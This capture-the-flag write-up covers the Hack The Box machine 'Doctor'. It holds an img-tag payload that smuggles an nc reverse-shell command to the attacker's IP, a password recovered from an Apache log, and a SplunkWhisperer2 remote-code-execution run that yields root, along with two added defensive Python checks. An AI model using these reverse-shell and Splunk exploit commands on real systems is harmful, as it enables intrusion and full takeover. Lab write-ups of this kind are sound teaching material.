Lluna's Pure land.


HTB-doctor

0x00 Overview

0x01. Information gathering

We can see that ports 22/80/8089 are open; the service on 8089 is Splunk.

root@JIYE:~/htb/doctor# nmap -sC -sV -sT 10.10.10.209 -oN nmap.CVT
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-18 03:21 EDT
Nmap scan report for 10.10.10.209
Host is up (0.35s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Doctor
8089/tcp open ssl/http Splunkd httpd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after: 2023-09-06T15:57:27
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.68 seconds
root@JIYE:~/htb/doctor#

0x02. Visit port 80 first

Same recipe, same flavor: add a hosts entry [doctors.htb 10.10.10.209]

0x03. Visit doctors.htb

1. Try some simple injection, but nothing.

2. Register a user

3. Log in

4. Manual crawling

Found that we can post messages; smells like stored XSS...

5. Build the XSS payload for a reverse shell

<img src=http://10.10.17.216/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.17.216'$IFS'6666')>

Listen on port 6666 on Kali first

root@JIYE:~/htb/doctor# nc -nvlp 6666
listening on [any] 6666 ...

Submit

root@JIYE:~/htb/doctor# nc -nvlp 6666
listening on [any] 6666 ...
connect to [10.10.17.216] from (UNKNOWN) [10.10.10.209] 38714
whoami
web
python3 -c 'import pty;pty.spawn("/bin/bash")'
web@doctor:~$

6. Upgrade the shell

web@doctor:~$ ^Z
[1]+ 已停止 nc -nvlp 6666
root@JIYE:~/htb/doctor# stty raw -echo
root@JIYE:~/htb/doctor# nc -nvlp 6666

web@doctor:~$
web@doctor:~$ pwd
/home/web
web@doctor:~$
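A defensive counterpart to the message-board payload above, added here and not part of the original writeup: the comment is HTML-escaped before it is rendered, and any image URL the application would go on to fetch is checked against the RFC 3986 character set, which has no room for shell metacharacters such as `$`, `(`, `)` or quotes. The comment handler and the sample comments are hypothetical and constructed for this example.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed sample comments. The second one is modelled on the payload
# shown in this writeup; the first is an ordinary image embed.
SAMPLE_COMMENTS = [
    '<img src="https://example.com/cat.png">',
    "<img src=http://10.10.17.216/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.17.216'$IFS'6666')>",
]

# src attribute value: double-quoted, single-quoted, or bare (as in the payload).
_IMG_SRC = re.compile(r"<img\b[^>]*?\bsrc\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))", re.I)
# Every character RFC 3986 permits in a URL. $ ( ) ' ` and whitespace are absent,
# so a command-substitution string fails validation before anything fetches it.
_URL_CHARS = re.compile(r"^[A-Za-z0-9\-._~:/?#\[\]@!&=+,;%]*$")
# A '%' not followed by two hex digits is a malformed escape, not a URL.
_BAD_PCT = re.compile(r"%(?![0-9A-Fa-f]{2})")


def extract_image_urls(comment):
    """Return every <img src=...> value in the submitted comment."""
    return [a or b or c for a, b, c in _IMG_SRC.findall(comment)]


def safe_image_url(url):
    """True only for a well-formed http(s) URL built from RFC 3986 characters."""
    if not _URL_CHARS.match(url) or _BAD_PCT.search(url):
        return False
    parts = urlsplit(url)
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def render_comment(comment):
    """Escape the whole comment so the browser treats it as text, not markup."""
    return html.escape(comment, quote=True)


def review_comments(comments):
    """For each comment: (escaped HTML to display, list of URLs that must not be fetched).
    Even an accepted URL should be retrieved with a library call, never by
    interpolating it into a shell command line."""
    results = []
    for comment in comments:
        rejected = [u for u in extract_image_urls(comment) if not safe_image_url(u)]
        results.append((render_comment(comment), rejected))
    return results


if __name__ == "__main__":
    for shown, rejected in review_comments(SAMPLE_COMMENTS):
        print(shown, "| rejected URLs:", rejected)
```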

0x04. Log in as user shaun

web@doctor:~$ cd /home/
web@doctor:/home$ ls
shaun web
web@doctor:/home$ cd shaun/
web@doctor:/home/shaun$ ls
user.txt
web@doctor:/home/shaun$ cat user.txt
cat: user.txt: Permission denied
web@doctor:/home/shaun$

Crawl through the files

web@doctor:~/blog$ cd /var/www/html/ 
web@doctor:/var/www/html$ ls
about.html contact.html departments.html images js
blog.html css fonts index.html services.html
web@doctor:/var/www/html$ cd /var/lo
local/ lock/ log/
web@doctor:/var/www/html$ cd /var/log/apache2/
web@doctor:/var/log/apache2$ ls
access.log access.log.5.gz error.log.10.gz error.log.5.gz
access.log.1 access.log.6.gz error.log.11.gz error.log.6.gz
access.log.10.gz access.log.7.gz error.log.12.gz error.log.7.gz
access.log.11.gz access.log.8.gz error.log.13.gz error.log.8.gz
access.log.12.gz access.log.9.gz error.log.14.gz error.log.9.gz
access.log.2.gz backup error.log.2.gz other_vhosts_access.log
access.log.3.gz error.log error.log.3.gz
access.log.4.gz error.log.1 error.log.4.gz
web@doctor:/var/log/apache2$ cat backup
10.10.14.4 - - [05/Sep/2020:11:09:48 +0200] "\x16\x03" 400 0 "-" "-"
10.10.14.4 - - [05/Sep/2020:11:09:48 +0200] "t3 12.1.2\n" 400 0 "-" "-"
10.10.14.4 - - [05/Sep/2020:11:09:48 +0200] "PROPFIND / HTTP/1.1" 405 521 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.10.14.4 - - [05/Sep/2020:11:09:48 +0200] "GET /.git/HEAD HTTP/1.1" 404 453 "-"
....

(a big chunk omitted...)

....
web@doctor:/var/log/apache2$ cat backup | grep pass
10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"
web@doctor:/var/log/apache2$

Got shaun's password [Guitar123]; log in

web@doctor:/var/log/apache2$ su shaun
Password:
shaun@doctor:/var/log/apache2$ whoami
shaun
shaun@doctor:/var/log/apache2$
shaun@doctor:/var/log/apache2$ cd
shaun@doctor:~$ ls
user.txt
shaun@doctor:~$ cat user.txt
**************************************
shaun@doctor:~$
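A defensive check suggested by the backup log above, added here and not part of the original writeup: it scans Apache access-log lines for requests that leak secrets into the URL, flagging a credential endpoint that takes parameters in the query string, parameter names such as password or token, and an email field whose value is not an address (the shape of the line that gave away shaun's password). The log lines are constructed for this example; the reset_password entry mirrors the one found on the box.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-log sample (not the box's real log).
SAMPLE_LOG = """\
10.10.14.4 - - [05/Sep/2020:11:09:48 +0200] "GET /.git/HEAD HTTP/1.1" 404 453 "-" "-"
10.10.14.4 - - [05/Sep/2020:11:17:34 +0200] "POST /reset_password?email=Guitar123 HTTP/1.1" 500 453 "http://doctor.htb/reset_password" "-"
10.10.14.4 - - [05/Sep/2020:11:18:02 +0200] "POST /login?username=shaun&password=hunter2 HTTP/1.1" 302 0 "-" "-"
10.10.14.4 - - [05/Sep/2020:11:19:10 +0200] "GET /blog.html?page=2 HTTP/1.1" 200 1234 "-" "-"
"""

# client, timestamp, method, request target (path + query), status code
_REQ = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)(?: \S+)?" (\d{3})')
SENSITIVE_PARAMS = {"password", "passwd", "pass", "pwd", "token", "secret", "otp"}
SENSITIVE_PATHS = {"/reset_password", "/login", "/change_password"}
_EMAIL = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


def find_leaked_secrets(log_text):
    """Return one finding per request whose query string probably carries a secret.
    Query strings land in access logs verbatim, so anything sensitive must travel
    in the request body instead; this check finds the cases where it did not."""
    findings = []
    for line in log_text.splitlines():
        m = _REQ.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        client, ts, method, target, status = m.groups()
        parts = urlsplit(target)
        params = dict(parse_qsl(parts.query, keep_blank_values=True))
        reasons = []
        if parts.path in SENSITIVE_PATHS and params:
            reasons.append("credential endpoint takes parameters in the query string")
        hits = sorted(k for k in params if k.lower() in SENSITIVE_PARAMS)
        if hits:
            reasons.append("sensitive parameter name(s): " + ", ".join(hits))
        email = params.get("email")
        if email is not None and not _EMAIL.match(email):
            reasons.append("email field holds a non-address value (a password typed into the wrong box?)")
        if reasons:
            findings.append({"client": client, "time": ts, "method": method,
                             "path": parts.path, "status": status, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_leaked_secrets(SAMPLE_LOG):
        print(f["time"], f["method"], f["path"], "->", "; ".join(f["reasons"]))
```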

0x05. Privilege escalation

1. shaun has no sudo rights

shaun@doctor:/home/web$ sudo -l
[sudo] password for shaun:
Sorry, user shaun may not run sudo on doctor.
shaun@doctor:/home/web$

What is Splunk

2. Splunk privilege-escalation tool (address below)

root@JIYE:~/htb/doctor# git clone https://github.com/cnotin/SplunkWhisperer2
正克隆到 'SplunkWhisperer2'...
remote: Enumerating objects: 7, done.
remote: Counting objects: 100% (7/7), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 55 (delta 1), reused 2 (delta 1), pack-reused 48
展开对象中: 100% (55/55), 20.68 KiB | 162.00 KiB/s, 完成.

root@JIYE:~/htb/doctor# ls
nmap.CVT SplunkWhisperer2 user

root@JIYE:~/htb/doctor# cd SplunkWhisperer2/

root@JIYE:~/htb/doctor/SplunkWhisperer2# ls
LICENSE PySplunkWhisperer2 README.md SharpSplunkWhisperer2

root@JIYE:~/htb/doctor/SplunkWhisperer2# cd PySplunkWhisperer2/

root@JIYE:~/htb/doctor/SplunkWhisperer2/PySplunkWhisperer2# ls
build_exe.bat PySplunkWhisperer2_local.py PySplunkWhisperer2_remote.py README.md requirements.txt

root@JIYE:~/htb/doctor/SplunkWhisperer2/PySplunkWhisperer2# proxychains pip2 install -r requirements.txt
ProxyChains-3.1 (http://proxychains.sf.net)
|DNS-request| ::1
|S-chain|-<>-127.0.0.1:1080-<><>-4.2.2.2:53-<><>-OK
|DNS-response|: ::1 does not exist
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support
Requirement already satisfied: requests in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 1)) (2.22.0)
|DNS-request| pypi.org
|S-chain|-<>-127.0.0.1:1080-<><>-4.2.2.2:53-<><>-OK
|DNS-response| pypi.org is 151.101.64.223
|S-chain|-<>-127.0.0.1:1080-<><>-151.101.64.223:443-<><>-OK
WARNING: You are using pip version 20.2.2; however, version 20.2.4 is available.
You should consider upgrading via the '/usr/bin/python2 -m pip install --upgrade pip' command.
root@JIYE:~/htb/doctor/SplunkWhisperer2/PySplunkWhisperer2# ls
build_exe.bat PySplunkWhisperer2_local.py PySplunkWhisperer2_remote.py README.md requirements.txt

root@JIYE:~/htb/doctor/SplunkWhisperer2/PySplunkWhisperer2# chmod +x PySplunkWhisperer2_remote.py
root@JIYE:~/htb/doctor/SplunkWhisperer2/PySplunkWhisperer2#

Check the README for usage

3. Listen on port 8888 on Kali first

root@JIYE:~# nc -nvlp 8888
listening on [any] 8888 ...

4. Execute

root@JIYE:~/htb/doctor/SplunkWhisperer2/PySplunkWhisperer2# python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.17.216 --username shaun --password Guitar123 --payload 'nc.traditional -e/bin/bash '10.10.17.216' '8888''
Running in remote mode (Remote Code Execution)
[.] Authenticating...
[+] Authenticated
[.] Creating malicious app bundle...
[+] Created malicious app bundle in: /tmp/tmpo7c3zpu6.tar
[+] Started HTTP server for remote mode
[.] Installing app from: http://10.10.17.216:8181/
10.10.10.209 - - [18/Oct/2020 04:50:53] "GET / HTTP/1.1" 200 -
[+] App installed, your code should be running now!

Press RETURN to cleanup


5. Got a shell

root@JIYE:~# nc -nvlp 8888
listening on [any] 8888 ...
connect to [10.10.17.216] from (UNKNOWN) [10.10.10.209] 49402
whoami
root

pwd
/

python3 -c 'import pty;pty.spawn("/bin/bash")'
root@doctor:/# cd
cd
bash: cd: HOME not set
root@doctor:/# ls
ls
bin dev lib libx32 mnt root snap sys var
boot etc lib32 lost+found opt run srv tmp
cdrom home lib64 media proc sbin swapfile usr
root@doctor:/# ^Z
[1]+ 已停止 nc -nvlp 8888
root@JIYE:~# stty raw -echo
root@JIYE:~# nc -nvlp 8888

root@doctor:/#
root@doctor:/#
root@doctor:/# cd /root/
root@doctor:/root# ls
root.txt
root@doctor:/root# cat root.txt
***********************************
root@doctor:/root#
------------- The paper is short but the feeling is long; see you next time -------------